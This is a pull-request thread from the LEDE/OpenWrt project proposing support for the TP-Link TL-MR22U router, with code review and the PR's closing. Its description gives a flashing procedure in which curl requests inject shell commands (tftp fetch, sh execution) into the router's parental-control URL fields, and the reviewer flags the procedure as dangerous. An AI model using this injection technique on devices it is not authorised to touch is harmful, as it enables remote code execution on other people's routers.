### PR TITLE
ar71xx: add initial support for TP-Link TL-MR22U v1

### PR DESCRIPTION
**Pull request by psyborg55**
Add initial support for TL-MR22U v1, portable battery-powered 3G router
based on QCA9531 chipset with 8M flash 32M RAM.
```
Image installation procedure:

Create file aa containing:

cd /tmp
tftp -gl img1 192.168.1.2
tftp -gl img2 192.168.1.2
tftp -gl busybox 192.168.1.2
chmod 755 busybox
ls -l > ls
tftp -pl ls 192.168.1.2

It should send both image parts and busybox to device, set permissions on
busybox, list the tmp directory contents, write them to file ls and send that
file back to server. You have to check that file so that it matches img
filesizes 1048576 and 7077888 before executing second command sequence that
will write these files to flash.

Create file bb containing:

cd /tmp
./busybox dd if=img1 of=/dev/mtdblock1 conv=fsync
./busybox dd if=img2 of=/dev/mtdblock2 conv=fsync

This should write files to kernel and rootfs partitions.

Split your downloaded or built image in two parts, first part needs to be
1048576 bytes large and named img1 while second part needs to be 7077888
bytes large and named img2.

Download busybox from keyboardgnome's reflash topic in OpenWrt forum, put it
in your tftp server root directory together with aa, bb, img1 and img2 files.

1. Reset device to factory settings

2. Set password using curl
curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=true' 'http://192.168.1.1/'

Password is admin42 after this.

3. Add parental control rule
curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=' --referer 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm' 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?ctrl_enable=1&parent_mac_addr=00-00-00-00-00-02&Page=1'

4. Execute first sequence of commands
curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=' --referer 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?Modify=0&Page=1' 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?child_mac=00-00-00-00-00-01&lan_lists=888&url_comment=test&url_0=;cd%20/tmp;&url_1=;tftp%20-gl%20aa%20192.168.1.2;&url_2=;sh%20aa;&url_3=&url_4=&url_5=&url_6=&url_7=&scheds_lists=255&enable=1&Changed=1&SelIndex=0&Page=1&rule_mode=0&Save=%B1%A3+%B4%E6'

5. Check the ls file got from device for img filesizes. If any of
the files have size of 0 bytes do not continue but restart procedure!

6. Go to web interface parental control (the one in the middle that has •, others have +) and delete the entry by clicking on the link at right.

7. Execute second sequence of commands
curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=' --referer 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?Modify=0&Page=1' 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?child_mac=00-00-00-00-00-01&lan_lists=888&url_comment=test&url_0=;cd%20/tmp;&url_1=;tftp%20-gl%20bb%20192.168.1.2;&url_2=;sh%20bb;&url_3=&url_4=&url_5=&url_6=&url_7=&scheds_lists=255&enable=1&Changed=1&SelIndex=0&Page=1&rule_mode=0&Save=%B1%A3+%B4%E6'

8. Wait 5 minutes until files are written and then power cycle device.
```
Signed-off-by: Tomislav Požega <pozega.tomislav@gmail.com>

### CODE REVIEW

File: target/linux/ar71xx/image/tp-link.mk [hunk 1]
```diff
@@ -384,6 +384,18 @@ define Device/tl-mr13u-v1
 endef
 TARGET_DEVICES += tl-mr10u-v1 tl-mr11u-v1 tl-mr11u-v2 tl-mr12u-v1 tl-mr13u-v1
 
+define Device/tl-mr22u-v1
+  $(Device/tplink-8mlzma)
+  DEVICE_TITLE := TP-LINK TL-MR22U V1
+  DEVICE_PACKAGES := kmod-usb-core kmod-usb2 kmod-usb-ledtrig-usbport
```
Comment (pepe2k) [inline target/linux/ar71xx/image/tp-link.mk]: Why did you include `kmod-usb-ledtrig-usbport` here if there is just one LED in your mach-*.C file and it's not used for USB?

File: target/linux/ar71xx/image/tp-link.mk [hunk 2]
```diff
@@ -384,6 +384,18 @@ define Device/tl-mr13u-v1
...
+  BOARDNAME := TL-MR22U
+  DEVICE_PROFILE := TLMR22U
+  TPLINK_HWID := 0x00220101
+  CONSOLE := ttyATH0,115200
```
Comment (pepe2k) [inline target/linux/ar71xx/image/tp-link.mk]: For QCA953x based devices this value is wrong. It should be `ttyS0,115200` and as [it's the default value](https://github.com/lede-project/source/blob/master/target/linux/ar71xx/image/Makefile#L105), you can just drop whole line.

File: target/linux/ar71xx/base-files/lib/upgrade/platform.sh [hunk 3]
```diff
@@ -451,6 +452,12 @@ platform_check_image() {
 			magic_ver="0200"
 			;;
 		esac
+		
+		case "$board" in
```
Comment (psyborg55) [inline target/linux/ar71xx/base-files/lib/upgrade/platform.sh]: case "$board" in
tl-wdr6500-v2 || tl-mr22u-v1)

did not work for me,should that be done differently?

File: target/linux/ar71xx/image/tp-link.mk (hunk 1 above)
Comment (psyborg55) [inline target/linux/ar71xx/image/tp-link.mk]: i'm not too familiar with leds so i just copied that from previous tp-link configs, if not required i'll remove it.

File: target/linux/ar71xx/base-files/lib/upgrade/platform.sh (hunk 3 above)
Comment (pepe2k) [inline target/linux/ar71xx/base-files/lib/upgrade/platform.sh]: It's a shell code, so you should use single `|`.

**Comment by pepe2k** [comment]
Hello @psyborg55,

Please make all requested changes in your local repository clone and then use `git commit --amend` to add them to your commit. Use `git push --force` to overwrite your GitHub repository/branch, which will afterwards update your pull request here automatically. Please, don't add more commits to your PR and squash all existing into one.

Also, please don't close this (and don't open a new one) pull request.

**Comment by psyborg55** [comment]
there was no local repository at the time the patch was submitted. with current git documentation i'm not even able to clone the repo and push back modifications, can't even imagine what should i do to clean and squash commits in this pr

**Comment by bobafetthotmail** [comment]
All your commits in this PR are in the master branch of your own fork of LEDE repo on github, which is here https://github.com/psyborg55/source

So you can clone that using the link you get from the green "clone or download" button.

There is some documentation on how to set up your local git repository here https://lede-project.org/submitting-patches#working_with_github

And also if you scroll a bit down in that page you find how to squash commits.

**Comment by pepe2k** [comment]
Hello @psyborg55,

Please, rebase your PR on current LEDE master branch, squash all your commits into one and:

- Include more information about device in your commit message (you can find some examples in commit history).
- Include short information how to install LEDE on the device you are adding support for (especially if it's not an usual way).
- Adjust your commit message so that it meets our requirements (line length).

Cheers,
Piotr

**Comment by psyborg55** [comment]
ubuntu@ubuntu:~/source$ git push --all
error: The requested URL returned error: 403 while accessing https://github.com/psyborg55/source/info/refs

fatal: HTTP request failed
ubuntu@ubuntu:~/source$ git push -f
error: The requested URL returned error: 403 while accessing https://github.com/psyborg55/source/info/refs

fatal: HTTP request failed


it did not ask for username and password! git --version 1.7.0.4

**Comment by pepe2k** [comment]
@psyborg55,

I would like to review your code, not guiding you how to use git and/or GitHub. This is not the right place for this. If you need some help, you can find more information on below websites:

1. [Git documentation](https://git-scm.com/documentation).
2. [GitHub help](https://help.github.com/).

Cheers,
Piotr

**Comment by psyborg55** [comment]
try to see now

**Comment by pepe2k** [comment]
@psyborg55,

> try to see now

You have removed all the changes I asked for earlier...

Cheers,
Piotr

**Comment by psyborg55** [comment]
All changes updated, except commit message which didn't change on multiple tries. Is installation procedure really needed there too, since it is already described in PR description?

**Comment by mkresin** [comment]
> All changes updated, except commit message which didn't change on multiple tries. Is installation procedure really needed there too, since it is already described in PR comment?

Yes it is required. The PR description is like an envelop and will not be part of the git commit history.

Please use `git commit --amend` to change the commit message and `git push --force` to update the PR. Should be really, now that you mastered git.

**Comment by psyborg55** [comment]
Done. It did not work because of gedit for some reason.

**Comment by pepe2k** [comment]
@psyborg55,

> Image can be installed through web server exploit detailed on forums:
> https://forum.openwrt.org/viewtopic.php?id=58520

Please, avoid using links in commit messages. In future, if the thread your link points to or whole forum is no longer available, how someone will know how to install image on this device?

Is the factory firmware on this device signed (RSA, etc.)?

Cheers,
Piotr

**Comment by psyborg55** [comment]
Yes, factory image is signed. I could not flash image after updating md5 checksum because of error 18009.

**Comment by pepe2k** [comment]
> Yes, factory image is signed. I could not flash image after updating md5 checksum because of error 18009.

Please, try to be more specific. Can you provide me firmware for this device (update file or dump from your device)? The installation procedure from your commit message looks totally wrong for me.

Cheers,
Piotr

**Comment by psyborg55** [comment]
The installation procedure was found to be used on wr703n successfully so i tried the same on this device and it worked as I've managed to flash it before opening. TP-Link firmware i had to beg their support for more than two weeks: 
[TL-MR22U_V1.0_20140123.zip](https://github.com/lede-project/source/files/990164/TL-MR22U_V1.0_20140123.zip)

**Comment by psyborg55** [comment]
@pepe2k ,

> In future, if the thread your link points to or whole forum is no longer available, how someone will know how to install image on this device?

How did I know how to install image on this device? I didn't. I had to explore any possible flashing solution. That's what this is all about isn't it?

**Comment by pepe2k** [comment]
@psyborg55,

Unfortunately, I'm not going to merge this PR.

It seems that the vendor firmware for this device is RSA-signed which means that we are not able to prepare any working image for it (as we don't know the private key).

Also, the custom flash procedure you have embedded in your commit message is (in my opinion) **overcomplicated** and in many places **wrong or dangerous**, e.g.:

1. It exploits web gui vulnerability which might be fixed by the vendor in future. You didn't even mention what vendor firmware version can be exploited with described procedure.
2. It requires preparing custom, statically linked binary or use some from _untrusted source_ which might be unavailable in future.
3. One of the upgrade step executes write to mtd partition `/dev/mtdblock2` which is still mounted in the running system. This is dangerous and may end up with soft-bricked device.

If you find other, working flashing procedure (maybe in U-Boot, with serial console access and TFTP server?), you can update and reopen this PR.

Cheers,
Piotr

**Comment by psyborg55** [comment]
1. is there any other vendor firmware version than this one 20140123 and it's available publicly? http://service.tp-link.com.cn/list_download_software_1_0_357.html

2. yes it needs some work

3. it is possible to use your modified u-boot version and flash it to mtdblock0, then use u-boot webserver to install image

**Comment by Redfoxmoon3** [comment]
Does the stock bootloader have something like TFTP recovery?

**Comment by psyborg55** [comment]
even if it does tftp recovery still probably requires serial console which requires disassembling device. forget serial + TFTP unless chinese market devices can autorecover (could not do this with mr13u after multiple tries) without issuing commands through serial interface.

**Comment by psyborg55** [comment]
updated PR

**Comment by lostwindsenril** [comment]
Hello, I have followed your guide, but nothing happened to the router after running the last command. Parental control rule could be added, but this device didn't reboot after finishing the process. It still runs stock firmware after I reboot it manually.
What's more, I have tried the u-boot from wiki.openwrt.org/toh/tp-link/tp-link_tl-mr22u_v1 by directly write it into flash with external flash programmer, but the u-boot didn't work normally. I do entered in the web server, but it will disconnect after 10 sec, so I never upload the firmware successfully.
I also tried write lede image together with u-boot into flash( use WR810N and WR802N's image, they both have the QCA9531/QCA9533 SOC, so I think it could work on MR22U). The original bootloader also tried, nothing work.
I have tried all ways I know to make it run Openwrt/LEDE, and now I was exhausted. Any suggestion will be appreciated.
Sorry for my poor English, since my mother tongue is Chinese.

**Pull request closed without merging**